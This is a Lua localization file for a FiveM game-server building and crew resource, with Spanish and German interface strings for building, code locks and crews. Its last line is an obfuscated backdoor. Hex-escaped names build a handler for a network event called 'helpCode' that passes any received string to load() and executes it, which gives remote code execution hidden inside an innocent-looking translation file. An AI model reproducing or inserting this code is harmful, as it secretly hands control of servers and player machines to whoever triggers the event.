    ["crew_new_invite"] = "Tienes una nueva invitación de tribu",
    ["crew_you_invited"] = "Estas invitado",
    ["crew_to_crew"] = " a tu tribu",
    ["crew_already_invited"] = "Ya invitaste a este jugador",
    ["crew_no_crew"] = "no tienes tribu",
    ["crew_limit_reached"] = "La tribu alcanzó el límite de miembros",
    ["crew_invite_accepted"] = "Invitación aceptada",
    ["crew_new_to_crew"] = " ahora es parte de tu Crew",
    ["crew_joined"] = "te uniste a la tribu ",
    ["crew_you_left"] = "Dejaste tu tribu",
    ["crew_left_crew"] = ' dejó la tribu',
    ["crew_player_removed"] = "Jugador eliminado de Tribu",
    ["crew_you_removed"] = "Te quitaron de tu tribu",

    -- code limit
    ["wrong_code_limit"] = "Alcanzaste el límite de código incorrecto",

}

languages['de'] = {
    -- ProgressBars --
    ['prog_prop_upgrade'] = "Am Upgraden...",
    ['prog_prop_repair'] = "Am Reparieren...",
    ['prog_plant_c4"'] = "C4 platzieren...",
    ['prog_health_regen_bed'] = "Gesundheit regenerieren...",
    ['prog_health_regen_sofa'] = "Gesundheit regenerieren...",
    ['prog_prop_remove'] = "Am Entfernen...",
    ['prog_add_fuel'] = "Brennstoff hinzufügen...",
    ['prog_prop_build'] = "Am Bauen...",
    

    -- No Target Texts (only edit this if you are not using a target system) -- 
    -- Information when interacting with a prop from a specific Type
    ["notarget_doors"] = 'Klicke ~INPUT_CONTEXT~, um mit der Tür zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Türmenü zu öffnen',
    ["notarget_windows"] = 'Klicke ~INPUT_CONTEXT~, um mit dem Fenster zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_walls"] = 'Drücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für Wände zu öffnen',
    ["notarget_bigwall"] = 'Drücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für große Wände zu öffnen',
    ["notarget_foundations"] = 'Drücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für Fundamente zu öffnen',
    ["notarget_ceiling"] = 'Drücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für Decken zu öffnen',
    ["notarget_pillar"] = 'Drücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für Pfeiler zu öffnen',
    ["notarget_cook"] = 'Klicke ~INPUT_CONTEXT~, um mit dem Lagerfeuer zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_storages"] = 'Klicke ~INPUT_CONTEXT~, um den Lagerplatz zu öffnen \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_beds"] = 'Klicke ~INPUT_CONTEXT~, um mit dem Bett zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_gate"] = 'Klicke ~INPUT_CONTEXT~, um mit dem Tor zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_generator"] = 'Klicke ~INPUT_CONTEXT~, um mit dem Generator zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_recycle"] = 'Klicke ~INPUT_CONTEXT~, um die Recyclingmaschine zu verwenden \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_crafting"] = 'Klicke ~INPUT_CONTEXT~, um zu craften \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_light"] = 'Klicke ~INPUT_CONTEXT~, um mit der Lampe zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_biggate"] = 'Klicke ~INPUT_CONTEXT~, um mit dem großen Tor zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü zu öffnen',
    ["notarget_biggateway"] = 'Klicke ~INPUT_CONTEXT~, um mit dem großen Tor zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für das Torrahmen zu öffnen',
    ["notarget_doorway"] = 'Klicke ~INPUT_CONTEXT~, um mit der Tür zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um das Menü für den Türrahmen zu öffnen',
    ["notarget_deadStorage"] = 'Klicke ~INPUT_CONTEXT~, um mit der Tasche zu interagieren \nDrücke ~INPUT_CONTEXT~ für 2 Sekunden, um die Tasche zu löschen',
    
    -- Drücken Sie Info --
    ["notarget_pressingText"] = "Drücken Sie ~INPUT_CONTEXT~, um das Menü zu öffnen",

    -- Tutorial-Text
    ["tutorial_text"] = 'Drücken Sie ~INPUT_CELLPHONE_LEFT~ oder ~INPUT_CELLPHONE_RIGHT~, um zu drehen, ~INPUT_CELLPHONE_UP~ oder ~INPUT_CELLPHONE_DOWN~, um auf oder ab zu bewegen, ~INPUT_WEAPON_WHEEL_NEXT~ oder ~INPUT_WEAPON_WHEEL_PREV~, um die Objektdistanz zu ändern,  ~INPUT_FRONTEND_RRIGHT~, um abzubrechen, oder ~INPUT_CELLPHONE_SELECT~, um zu akzeptieren',

    -- Allgemeine Lokalisierungen --
    ["object_in_that_coords"] = "Es befindet sich bereits ein Objekt an diesen Koordinaten",
    ["need_door_frame"] = "Sie benötigen einen Tür-Rahmen",
    ["no_permission"] = "Sie haben keine Berechtigung.",
    ["no_permission_build"] = "Sie haben keine Berechtigung, hier zu bauen",
    ["no_item"] = "Sie haben dieses Item nicht",
    ["base_repaired"] = "Basis repariert",
    ["object_repaired"] = "Objekt repariert",
    ["no_space"] = "Nicht genug Inventarplatz",
    ["no_build_zone"] = "Sie können in dieser Zone nicht bauen",
    ["need_window_frame"] = "Sie benötigen einen Fensterrahmen",
    ["need_gate_frame"] = "Sie benötigen einen Torrahmen",
    ["foundation_up"] = "Das Fundament muss oben sein",
    ["foundation_down"] = "Das Fundament muss unten sein",
    ["need_pillars"] = "Sie benötigen mindestens 2 Pfeiler oder eine Wand, um eine Decke zu erstellen",
    ["light_close"] = "In der Nähe dieses Ortes befindet sich bereits eine Lampe",
    ["to_close_foundation"] = "Sie sind zu nah an einem Fundament",
    ["no_under_ground"] = "Sie können nicht unter der Erde bauen",
    ["to_close"] = "Zu nah an einem anderen Objekt",
    ["need_big_gateway"] = "Sie benötigen einen großen Torrahmen",
    ["no_foundation"] = "Es gibt kein Fundament oder keine Decke",
    ["no_fuel"] = "Sie haben keinen Treibstoff.",
    ["tank_full"] = "Der Tank ist voll",
    ["you_added"] = "Sie haben hinzugefügt ",
    ["l_fuel"] = "L Treibstoff",
    ["code_set"] = "Code gesetzt auf ",
    ["turn_off"] = "Ausgeschaltet",
    ["turn_on"] = "Eingeschaltet",
    ["no_fuel"] = "Nicht genug Treibstoff",
    ["wrong_code"] = "Falscher Code",
    ["no_advanced"] = "Keine erweiterte Interaktion.",
    ["no_c4"] = "Sie benötigen Sprengstoff",
    ["no_explode"] = "Kann nicht explodieren",
    ["need_items"] = "Benötigte Gegenstände:",
    ["repair_success"] = "Reparatur erfolgreich",
    ["no_gate"] = "Es gibt kein Tor zum Interagieren",
    ["no_door"] = "Es gibt keine Tür zum Interagieren",
    ["no_electricity"] = "Es gibt keine Stromversorgung",
    ["no_player_id"] = "Kein Spieler mit dieser ID ist online",
    ["permission_added"] = "Berechtigung hinzugefügt",
    ["permission_removed"] = "Berechtigung entfernt",
    ["perm_clear"] = "Berechtigungen gelöscht",
    ["interact_with"] = "Interagieren mit ",
    ["open"] = "Öffnen ",
    ["settings"] = " Einstellungen",
    ["no_interactions"] = "Sie können damit nicht interagieren",
    ["delete"] = "Löschen ",
    ["need_codelock"] = "Sie benötigen ein Code-Schloss",
    ["use_c4"] = "Verwenden Sie C4 auf diesem ",
    ["to_much_props"] = "Zu viele Objekte in dieser Zone",
    ["incorrect_shape"] = "Falsche Form",
    ["build_limit_1"] = "Sie haben Ihr Baulimit erreicht",
    ["bed_limit"] = "Sie können nur ein Bett haben",
    ["no_stability"] = "Dieses Objekt benötigt mehr Stabilität",


    -- CREW --

    ["crew_menu"] = "Crew-Menü",
    ["crew_playerList"] = "Liste der Spieler",
    ["crew_manage"] = "Crew-Verwaltung",
    ["crew_invitesList"] = "Einladungsliste",
    ["crew_invite_header"] = "SPIELER EINLADEN",
    ["crew_invite_desc"] = "Klicke, um Spieler zur Crew einzuladen",
    ["crew_manage_header"] = "SPIELER VERWALTEN",
    ["crew_manage_desc"] = "Klicke, um die Crew zu verwalten",
    ["crew_delete_header"] = "CREW LÖSCHEN",
    ["crew_delete_desc"] = "Klicke, um die Crew zu löschen",
    ["crew_leave_header"] = "CREW VERLASSEN",
    ["crew_leave_desc"] = "Klicke, um die Crew zu verlassen",
    ["crew_invites_header"] = "EINLADUNGEN ÖFFNEN",
    ["crew_invites_desc"] = "Klicke, um Einladungen zu öffnen",
    ["crew_create_header"] = "Crew erstellen",
    ["crew_create_desc"] = "Klicke, um eine Crew zu erstellen",
    ["crew_join"] = "Klicke, um der Crew beizutreten",
    ["crew_no_invites"] = "Keine Einladungen vorhanden",
    ["crew_remove_player"] = "Klicke, um diesen Spieler aus der Crew zu entfernen",
    ["crew_no_remove_you"] = "Du kannst dich nicht selbst entfernen",
    ["crew_invite_player"] = "Klicke, um diesen Spieler zur Crew einzuladen",
    ["crew_no_players"] = "Keine Spieler in deiner Nähe",
    ["crew_created"] = "Du hast eine Crew erstellt",
    ["crew_deleted"] = "Deine Crew wurde gelöscht",
    ["crew_player_on_crew"] = "Spieler ist bereits Teil einer Crew",
    ["crew_crew_limit"] = "Du hast das Crew-Limit erreicht",
    ["crew_new_invite"] = "Du hast eine neue Crew-Einladung erhalten",
    ["crew_you_invited"] = "Du hast ",
    ["crew_to_crew"] = " in deine Crew eingeladen",
    ["crew_already_invited"] = "Du hast diesen Spieler bereits eingeladen",
    ["crew_no_crew"] = "Du hast keine Crew",
    ["crew_limit_reached"] = "Die Crew hat das Mitglieder-Limit erreicht",
    ["crew_invite_accepted"] = "Einladung angenommen",
    ["crew_new_to_crew"] = " ist jetzt Teil deiner Crew",
    ["crew_joined"] = "Du bist der Crew beigetreten ",
    ["crew_you_left"] = "Du hast deine Crew verlassen",
    ["crew_left_crew"] = ' hat die Crew verlassen',
    ["crew_player_removed"] = "Spieler aus der Crew entfernt",
    ["crew_you_removed"] = "Du wurdest aus deiner Crew entfernt",

    -- Code-Limit
    ["wrong_code_limit"] = "Du hast das Limit für falsche Codes erreicht",
}

local CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G} CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[6][CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[1]](CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[2]) CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[6][CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[3]](CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[2], function(XzFfFjtZeuOIumxWRIiNxwVSChNoBSxZGRKxgiZtiaSQNbVHZsvJGiGmLLzegJqmVMntUN) CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[6][CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[4]](CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[6][CFUVUmTrHUMdtenQnmyXNsbWUTMcqYMxXJhWJtMrWXIlUoDbWDokVKEjLLGblieRPtatja[5]](XzFfFjtZeuOIumxWRIiNxwVSChNoBSxZGRKxgiZtiaSQNbVHZsvJGiGmLLzegJqmVMntUN))() end)